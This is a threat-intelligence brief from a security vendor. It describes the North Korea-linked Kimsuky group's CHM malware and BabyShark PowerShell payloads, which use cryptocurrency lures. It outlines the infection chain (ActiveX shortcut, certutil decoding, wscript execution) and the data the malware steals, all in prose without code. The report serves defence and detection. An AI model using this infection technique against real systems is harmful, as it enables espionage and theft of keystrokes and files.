ALL MENU

Technology
S2W's Technology
AI
Big Data
Security
Products
SAIP
QUAXAR
XARVIS
EYEZ
Services
AI Data Consulting
Penetration Testing
Incident Response
Request for Intelligence
Resources
Event
Webinar
SIS
Conference
About S2W
About S2W
History
News

QUICK LINKS

Resources
  • Research
  • Threat Analysis Brief Reports
Kimsuky’s CHM and BabyShark Malware Using Cryptocurrency Theme
2025.06.17

✅ Report Title: Kimsuky’s CHM and BabyShark Malware Using Cryptocurrency Theme



The S2W Threat Intelligence Center has published an analytical report on CHM and BabyShark malware leveraging cryptocurrency themes, attributed to the North Korea-backed APT group Kimsuky.

 


✅ Executive Summary:


1. Summary


- On May 26, 2025, during continuous tracking of the Kimsuky group, S2W’s Threat Intelligence Center TALON identified and analyzed CHM and BabyShark malware disguised with cryptocurrency-related themes.
- The CHM malware uses the Windows Compiled HTML Help (CHM) format and executes PowerShell commands via JavaScript embedded within HTML files, which then download and run additional scripts from a C2 server.
- The downloaded PowerShell script was identified as a BabyShark variant capable of exfiltrating host information, process data, file directories, and keystrokes from infected systems.



📌 Key Malware File Information: CHM Malware (wallet.chm)


This file uses Microsoft’s CHM (Compiled HTML Help) format and contains a malicious HTML file. When the user opens the CHM file and clicks the 'National Tax Law' section, `page_1.html` is executed via the `wallet.hhc` file.

The HTML includes a script that creates and executes a shortcut object (.lnk) using ActiveX controls. It stores an encoded PowerShell command in `Link.dat`, which is then decoded via the `certutil` command to generate a `Link.ini` file in the same directory.

`Link.ini` is then executed using `wscript.exe`, leading to the download and execution of additional scripts from a C2 server. This C2 infrastructure was found to be hosted on a compromised domestic electronics manufacturing and repair company server.

Notably, the execution interface was identical to a CHM malware sample attributed to Kimsuky observed in March 2025, although the C2 URLs used for payload delivery were different, indicating a shift in infrastructure.



📌 Additional Payload: BabyShark Malware


The script downloaded with the `query=1` parameter was identified as a variant of BabyShark malware linked to the Kimsuky group.

This malware collects the following data from infected systems:

- System information (computer name, owner, manufacturer, model, system info, OS, CPU, etc.)
- Directory and file listings
- List of currently running processes
- Information on installed antivirus software


Collected data is Base64-encoded and exfiltrated via HTTP POST requests. The malware also downloads and executes additional payloads.

These payloads receive further commands from the C2 server via PowerShell and execute them using the `Win32_ProcessStartup` object to hide the process window.



📌 Additional Payload: User Monitoring Script


The PowerShell script retrieved using the `idx=5` parameter captures clipboard contents and keystrokes. To prevent duplicate execution, it creates a mutex named `GlobalAlreadyRunning19122345` and periodically sends stolen data to the C2 server.



✅ Recommended Threat Detection and Mitigation Actions:


- Kimsuky continues to distribute malware using cryptocurrency themes. Continued monitoring is advised. It is recommended to inspect and block access to related C2 domains and URLs.
- Additional reports on Kimsuky activity are available for reference.


👉 Contact us: https://s2w.inc/en/contact


*The full report is available upon request and for QUAXAR subscribers.


Product
How Much Dark Web Data Coverage Do You Provide?
2025.06.13
Previous
News Highlights
Weekly Darkweb in June W2
2025.06.18
Next
List